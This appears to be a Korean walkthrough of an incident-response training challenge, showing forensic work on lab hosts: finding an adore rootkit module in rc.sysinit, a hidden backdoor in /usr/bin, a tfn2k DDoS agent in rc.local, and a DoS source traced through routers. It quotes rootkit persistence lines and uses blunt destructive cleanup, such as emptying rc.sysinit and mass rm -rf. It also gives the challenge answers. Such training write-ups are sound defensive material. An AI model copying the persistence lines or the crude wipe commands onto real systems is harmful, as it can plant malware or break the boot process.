PID PPID UID GID COMMAND
1    0 0 0 init
2    1 0 0 keventd
3    1 0 0 kapmd
4    1 0 0 ksoftirqd_CPU0
5    1 0 0 kswapd
6    1 0 0 bdflush
7    1 0 0 kupdated
8    1 0 0 mdrecoveryd
128    1 0 0 kjournald
241    1 1 0 portmap
443    1 0 0 syslogd
448    1 0 0 klogd
551    1 0 0 xinetd
575    1 0 0 sendmail
606    1 1 0 cannaserver
620    1 0 0 crond
641    1 0 0 /sbin/mingetty
642    1 0 0 /sbin/mingetty
643    1 0 0 /sbin/mingetty
644    1 0 0 /sbin/mingetty
645    1 0 0 /sbin/mingetty
646    1 0 0 /sbin/mingetty
649 551    0 0 in.telnetd
650 649    0 0 login
651 650    0 0 -bash

portmap 이라는 프로세스가 루트킷임을 짐작해 볼 수 있습니다.
이제 의심되는 모듈을 로드하는 부분이 어딘지 찾아가보면,

/etc/rc.d
# ls -al
total 485
drwxr-xr-x    2 root other 512 Apr 21 16:46 .
drwxr-xr-x 44 root sys 12800 Apr 21 14:46 ..
-rw-------    1 root other    449392 May 13 2006 core
-rw-r--r--    1 root other 22556 Apr 21 16:46 rc.sysinit

rc.sysinit의 가장 마지막 줄에

if [ -f /sbin/insmod ] ; then
   /sbin/insmod -f /usr/lib/adore.o > /dev/null 2>&1
else
   if [ -f /bin/insmod ] ; then
   /bin/insmod -f /usr/lib/adore.o > /dev/null 2>&1
   fi
fi

윗 부분이 의심 됩니다.

해당 파일들을 모두 지웁니다.

cat /dev/null > rc.sysinit
# rm -rf /usr/lib/adore.o

finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > lkm 모듈이 숨기려고한 프로세스의 이름을 입력하시오.
Answer > portmap
Congratz! You made a success of challenge!

=====================================================
Question 7 - Investigation
=====================================================

# df
/    (/dev/dsk/c1t1d0s0 ): 7779848 blocks 495157 files
/usr (/dev/dsk/c1t1d0s4 ): 3723486 blocks 934936 files
/boot    (/dev/dsk/c1t5d0s2 ): 61414 blocks    18991 files
/proc    (/proc ): 0 blocks    29926 files
/dev/fd    (fd    ): 0 blocks    0 files
/etc/mnttab    (mnttab    ): 0 blocks    0 files
/var (/dev/dsk/c1t1d0s5 ):91428054 blocks 5972251 files
/var/run (swap    ):23216992 blocks 440747 files
/tmp (swap    ):23216992 blocks 440747 files
/data    (/dev/dsk/c1t1d0s6 ):    4408 blocks    18876 files
/home1 (/dev/dsk/c1t2d0s7 ):137973652 blocks 8473929 files
/backup    (/dev/dsk/c1t1d0s7 ): 219640 blocks    57019 files
/home3 (/dev/dsk/c1t4d0s7 ):141184988 blocks 8476538 files
/home4 (/dev/dsk/c1t5d0s0 ): 582428 blocks 152061 files
/home    (/dev/dsk/c1t5d0s3 ): 2641676 blocks 324324 files
/mnt (/dev/dsk/c1t5d0s7 ):133757598 blocks 8056345 files

dd를 이용해 img로 만듭니다.

cd /home1/user001
# ls -al
total 15999
drwxr-xr-x    2 user001 training    512 Apr 22 19:23 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 22 19:02 .profile
-rw-r--r--    1 user001 training    124 Apr 22 19:02 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 19:02 local.login
-rw-r--r--    1 user001 training    582 Apr 22 19:02 local.profile
-rw-r--r--    1 root other    726658 Apr 22 19:23 tct-1.12.tar.gz
# dd if=/dev/dsk/c1t1d0s6 of=/home1/user001/backup.img
30528+0 records in
30528+0 records out
# ls -al
total 31271
drwxr-xr-x    2 user001 training    512 Apr 22 19:24 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 22 19:02 .profile
-rw-r--r--    1 root other    15630336 Apr 22 19:24 backup.img
-rw-r--r--    1 user001 training    124 Apr 22 19:02 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 19:02 local.login
-rw-r--r--    1 user001 training    582 Apr 22 19:02 local.profile
-rw-r--r--    1 root other    726658 Apr 22 19:23 tct-1.12.tar.gz

tct-1.12.tar.gz의 압축을 풀고 해당 폴더의 bin디렉토리에 들어갑니다.

# ./unrm
../../backup.img > worm.result

명령을 하신 후,
worm.result를 잘 뒤져보면 답을 구할 수 있습니다. -_-

=====================================================
Question 8 - Dos 방어
=====================================================

먼저 라우터들의 IP를 구합니다.

cat /etc/hosts
#
# Internet host table
#
127.0.0.1 localhost
172.16.5.111    zolaris loghost
172.16.5.1    router1
10.10.10.1    router2
10.222.88.144 router3
10.222.88.73    router4

첫번째 라우터부터 차례로 들어가며 명령을 set 해줍니다.

- 첫번째 라우터는 별로 건질게 없는것으로 보입니다.

두번째 라우터 :

Router2# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
   Se1 5.5.4.1 EI0 172.16.5.111    06 040c 0050 299

Router2# sh ip cef se1
sh command Argument ip cef se1
   Prefix    Next Hop    Interface
   10.222.88.128./25 attached    Serial0
   10.222.88.144/32    10.222.88.144 Ethernet1
   10.222.88.73/32 10.222.88.73    Ethernet1

첫번째 시리얼에 5.5를 포함하는 연결이 있음을 알 수 있고,
다음 hop들이 차례로 router3,router4인것을 볼 수 있습니다.
그럼으로 router3,router4에 대한 추가적인 분석이 필요해 보입니다.

세번째 라우터 :

Router3# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
Router3#

세번째 라우터에는 연결이 없는것으로 보입니다.

네번쨰 라우터 :

Router4# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
   Se1 5.5.4.1 EI0 172.16.5.111    06 040c 0050 6673

Router4# sh ip cef se1
sh command Argument ip cef se1
   Prefix Next Hop Interface
   222.168.97.0/24    attached Serial0
222. .97.2/32    222. .97.2 Ethernet1
Router4#

드디어 라우터의 ip가 아닌 hop을 찾아내었습니다.
해당 주소가 공격자의 ip로 의심됩니다.

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자의 IP 주소는 무엇인가?
Answer > 222. .97.2
Congratz! You made a success of challenge!

공격자의 접속을 막기위해서 인증전에 다음을 행해 주셔야 합니다. :

conf t
access-list 105 deny ip host 5.5.4.1 any
access-list 105 permit ip any any
exit
w

=====================================================
Question 9 - Investigation
=====================================================

먼저 해당 문제를 시작하기 전에 process list들을 구해둡니다

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cer
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ?    0:00 ipmon -Ds
root 14678 14670 0 22:43:59 pts/2    0:00 ps -ef
root    65 1 0 Apr 20 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 Apr 20 ?    1:37 /usr/lib/picl/picld
root    74 1 0 Apr 20 ?    0:00 devfsadmd
root 185 1 0 Apr 20 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ?    0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ?    0:00 /usr/sbin/nscd
root 431 1 0 Apr 20 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ?    0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/
ib/sf880drd
root 438 1 0 Apr 20 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ?    0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ?    0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ?    0:00 htt_server -port 9010 -syslog -m
ssage_locale C
root 525 1 0 Apr 20 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ?    0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ?    0:00 /usr/lib/im/htt -port 9010 -sysl
g -message_locale C
root 596 1 0 Apr 20 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/
nmp/conf
root 561 1 0 Apr 20 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ?    0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 Apr 20 ?    0:00 /usr/lib/saf/sac -t 300
root 14616 14535 0 22:43:42 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.4
.67
root 14535 418 0 22:42:22 ?    0:00 in.telnetd
root 3374 636 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ?    0:00 /usr/openwin/bin/fbconsole -d :0
root 14670 14663 0 22:43:52 pts/2    0:00 sh

이제 문제를 시작한 후,
리스들을 다시 구해옵니다.

UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ?    0:00 ipmon -Ds
root    65 1 0 Apr 20 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 Apr 20 ?    1:37 /usr/lib/picl/picld
root    74 1 0 Apr 20 ?    0:00 devfsadmd
root 185 1 0 Apr 20 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ?    0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ?    0:00 /usr/sbin/nscd
root 431 1 0 Apr 20 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ?    0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ?    0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ?    0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ?    0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 596 1 0 Apr 20 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ?    0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ?    0:00 /usr/lib/saf/ttymon
root 14727 14670 0 22:44:31 pts/2    0:00 ps -ef
root 699 1 0 Apr 20 ?    0:00 /usr/lib/saf/sac -t 300
root 14723 1 0 22:44:29 ?    0:00 /usr/bin/.
root 14616 14535 0 22:43:42 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 14535 418 0 22:42:22 ?    0:00 in.telnetd
root 3374 636 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ?    0:00 /usr/openwin/bin/fbconsole -d :0
root 14670 14663 0 22:43:52 pts/2    0:00 sh

의심되는 process인 pid 14723을 발견 하였습니다.

# cd /proc/14723/object
# ls -al
total 2540
dr-x------    2 root other 544 Apr 21 23:01 .
dr-x--x--x    5 root other 736 Apr 21 23:01 ..
-r-xr--r--    1 root other    125708 Apr 21 23:01 a.out
-r-xr-xr-x    1 root bin    4848 May 6 2006 ufs.118.28.306902
-r-xr-xr-x    1 root bin    5292 May 6 2006 ufs.118.28.343137
-r-xr-xr-x    1 root bin 24968 May 6 2006 ufs.118.28.343169
-r-xr-xr-x    1 root bin    238608 May 6 2006 ufs.118.28.343181
-r-xr-xr-x    1 root bin 70864 May 6 2006 ufs.118.28.343185
-r-xr-xr-x    1 root bin 1158072 May 6 2006 ufs.118.28.343531
-r-xr-xr-x    1 root bin    911328 May 6 2006 ufs.118.28.343533
# strings a.ou
   t
backdoor
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Command (type 'quit' to quit) :
connection closed by client
Recv
quit
Received Data :
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
Accept
Listen
Bind
SetSocketOpt
Socket
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport

내부에 백도어라고 써있는 것을 보아, 대상 프로그램이 맞는것으로 보입니다.

대상 프로세스가 사용하는 파일들을 구합니다.

# /usr/local/bin/lsof -p 14723
lsof: WARNING: bad section count line in /root/.lsof_cert: line "4 sections, dev

=7600000000"
lsof: WARNING: can't unlink /root/.lsof_cert: Permission denied
COMMAND PID USER FD TYPE    DEVICE SIZE/OFF NODE NAME
.^T.4 15858 root cwd VDIR    118,24 1024    2 /
.^T.4 15858 root txt VREG    118,28 125708 626207 /usr/bin/.^T.4
.^T.4 15858 root txt VREG    118,28 1158072 343531 /usr/lib/libc.so.1
.^T.4 15858 root txt VREG    118,28 911328 343533 /usr/lib/libnsl.so.

1
.^T.4 15858 root txt VREG 118,28 24968 343169 /usr/lib/libmp.so.2

.^T.4 15858 root txt VREG 118,28 4848 306902 /usr/platform/sun4u

-us3/lib/libc_psr.so.1
.^T.4 15858 root txt VREG 118,28 70864 343185 /usr/lib/libsocket.

so.1
.^T.4 15858 root txt VREG 118,28 5292 343137 /usr/lib/libdl.so.1

.^T.4 15858 root txt VREG 118,28 238608 343181 /usr/lib/ld.so.1
.^T.4 15858 root 0r VCHR 13,2 0t0 30209 /devices/pseudo/mm@

0:null
.^T.4 15858 root 1w VCHR 13,2 0t0 30209 /devices/pseudo/mm@

0:null
.^T.4 15858 root 2w VCHR 13,2 0t0 30209 /devices/pseudo/mm@

0:null
.^T.4 15858 root 3u IPv4 0x3000848b848 0t0 TCP *:42904 (LISTEN)

find 를 이용해 찾아 보면,

# find /usr/bin -name ".*" -exec ls -alQ {} \;
-r-xr-xr-x    1 root other 0 May 24 2005 "/usr/bin/.\024.6"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.3"
-r-xr-xr-x    1 root other 0 May 24 2005 "/usr/bin/.\024.7"
-r-xr-xr-x    1 root other    125708 May 30 2005 "/usr/bin/.\024.99"
-r-xr-xr-x    1 root other 0 May 26 2005 "/usr/bin/.\024.8"
-r-xr-xr-x    1 root other 0 May 26 2005 "/usr/bin/.\024.9"
-r-xr-xr-x    1 root other 0 May 26 2005 "/usr/bin/.\024.10"
-r-xr-xr-x    1 root other 0 May 26 2005 "/usr/bin/.\024.11"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.12"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.13"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.14"
-r-xr-xr-x    1 root other 0 May 27 2005 "/usr/bin/.\024.15"
-r-xr-xr-x    1 root other 0 May 27 2005 "/usr/bin/.\024.16"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.17"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.24"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.27"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.28"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.29"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.32"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.33"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.36"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.37"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.38"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.39"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.40"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.41"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.42"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.43"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.44"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.45"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.46"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.47"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.48"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.49"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.50"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.51"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.52"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.53"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.54"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.55"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.56"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.57"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.58"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.59"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.60"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.61"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.62"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.63"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.64"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.65"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.66"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.67"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.68"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.69"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.70"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.71"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.72"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.73"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.74"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.75"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.76"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.77"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.78"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.79"
-r-xr-xr-x    1 root other 0 May 12 2005
   "/usr/bin/.\024.80"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.81"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.82"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.83"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.84"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.85"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.86"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.87"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.88"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.89"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.90"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.91"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.92"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.93"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.94"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.95"
-r-xr-xr-x    1 root other    125708 May 30 2005 "/usr/bin/.\024.96"
-r-xr-xr-x    1 root other    125708 May 30 2005 "/usr/bin/.\024.97"
-r-xr-xr-x    1 root other    125708 May 30 2005 "/usr/bin/.\024.98"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.100"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.101"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.102"
-r-xr-xr-x    1 root other 0 May 12 2005 "/usr/bin/.\024.103"

좀 많습니다.

#find /usr/bin -name ".*" -exec rm -rf {} \;
#
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

통과 됬네요.

=====================================================
Question 10 - 조사단계
=====================================================

before :

after :

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ?    0:00 ipmon -Ds
root    65 1 0 Apr 20 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 Apr 20 ?    1:43 /usr/lib/picl/picld
root    74 1 0 Apr 20 ?    0:00 devfsadmd
root 185 1 0 Apr 20 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ?    0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ?    0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ?    0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ?    0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ?    0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ?    0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2    0:00 sh
root 596 1 0 Apr 20 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ?    0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ?    0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3    0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ?    0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ?    0:00 in.telnetd
root 24663 24569 0 00:15:48 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ?    0:00 in.telnetd
root 3374 636 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ?    0:00 /usr/openwin/bin/fbconsole -d :0
root 24719 24707 0 00:16:11 pts/2    0:00 ps -ef
# challenge 10
Now, You are challenging question 10.
Good Luck!
# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ?    0:00 ipmon -Ds
root    65 1 0 Apr 20 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 Apr 20 ?    1:43 /usr/lib/picl/picld
root    74 1 0 Apr 20 ?    0:00 devfsadmd
root 185 1 0 Apr 20 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ?    0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ?    0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ?    0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ?    0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ?    0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ?    0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2    0:00 sh
root 596 1 0 Apr 20 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ?    0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ?    0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3    0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ?    0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ?    0:00 in.telnetd
root 24783 24707 0 00:16:38 pts/2    0:00 ps -ef
root 24663 24569 0 00:15:48 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ?    0:00 in.telnetd
root 3374 636 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ?    0:00 /usr/openwin/bin/fbconsole -d :0
root 24767 1 0 00:16:36 ?    0:00 /dev/tfn2k

의심되는 프로세스인 /dev/tfn2k를 발견할 수 있습니다.

# cd /etc/rc.d
# ls -al
total 463
drwxr-xr-x    2 root other 512 Apr 22 00:16 .
drwxr-xr-x 44 root sys 12800 Apr 22 00:15 ..
-rw-------    1 root other    449392 May 13 2006 core
-rw-r--r--    1 root other 233 Apr 22 00:16 rc.local
# cat rc.local
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local

/dev/tfn2k

삭제 작업을 행해 줍니다.

# kill -9 25420
# cat /dev/null > /etc/rc.d/rc.local
# cd /dev
# ls tfn2k -al
-r-xr--r-- 1 root other 114132 Apr 22 00:23 tfn2k
# chattr -i tfn2k
# rm -rf tfn2k

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 11 - 특정 사고별 분석
=====================================================

before :

after :

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
